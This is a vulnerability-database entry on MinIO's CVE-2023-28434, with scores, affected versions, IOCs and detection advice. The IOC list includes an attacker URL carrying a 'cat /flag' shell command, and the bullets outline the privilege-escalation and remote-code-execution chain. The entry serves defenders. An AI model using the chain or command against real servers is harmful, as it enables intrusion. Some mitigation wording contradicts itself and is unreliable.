cbcvebase.
CVE-2023-28434
published 2023-03-22

CVE-2023-28434: Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name…

PriorityP185high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2023-10-10
Exploited in the wild
EPSS
6.74%
93.1th percentile
Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket`. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, enable browser API access and turn off `MINIO_BROWSER=off`.

Affected

3 ranges
VendorProductVersion rangeFixed in
github.comminio_minio>= 0 < 0.0.0-2023032004150.0.0-202303200415
miniominio< RELEASE.2023-03-20T20-16-18ZRELEASE.2023-03-20T20-16-18Z
miniominio< 2023-03-20t20-16-18z2023-03-20t20-16-18z

Detection & IOCsextracted from sources · hover to see the quote

path/.minio.sys/
path.minio.sys/config
pathconfig/iam/service-accounts/TFNS/identity.json
urlhttp://47.251.10.169:35367/anything?alive=cat%20/flag
ip47.251.10.169
  • Detect CVE-2023-28434 exploitation attempts by monitoring HTTP POST requests to MinIO endpoints where the Content-Type header is 'multipart/form-datA' (capital A) — this bypasses the server-side regex check 'multipart/form-data*' which inadvertently matches the truncated string.
  • Monitor for POST requests targeting the '/.minio.sys/' bucket path, especially writing to 'config/iam/service-accounts/' — this is the privilege escalation write path used in exploitation.
  • Alert on use of 'mc admin update' commands pointing to external/untrusted URLs — this is the RCE delivery mechanism chained after CVE-2023-28434 privilege escalation, using the evil_minio project.
  • CVE-2023-28434 is frequently chained with CVE-2023-28432 (information disclosure leaking MINIO_SECRET_KEY / MINIO_ROOT_PASSWORD). Detections should look for both: a POST to /minio/health/cluster or /minio/login for the info-disclosure, followed by PostPolicyBucket abuse.
  • The attack requires credentials with 'arn:aws:s3:::*' permission and enabled Console API access. Audit IAM policies for overly broad S3 wildcard permissions on MinIO instances.
  • ·CVE-2023-28434 only affects MinIO versions prior to RELEASE.2023-03-20T20-16-18Z. Instances already patched to this release or later are not vulnerable.
  • ·Exploitation requires Console API access to be enabled. Disabling it (MINIO_BROWSER=off) is a documented workaround, though enabling browser API access is the preferred mitigation path.
  • ·The regex bypass ('multipart/form-data*' matching 'multipart/form-dat') is the root cause. The fix was applied in commit 67f4ba154a27a1b06e48bfabda38355a010dfca5; WAF rules should normalize or strictly validate Content-Type headers on MinIO endpoints.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv8.8HIGH
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.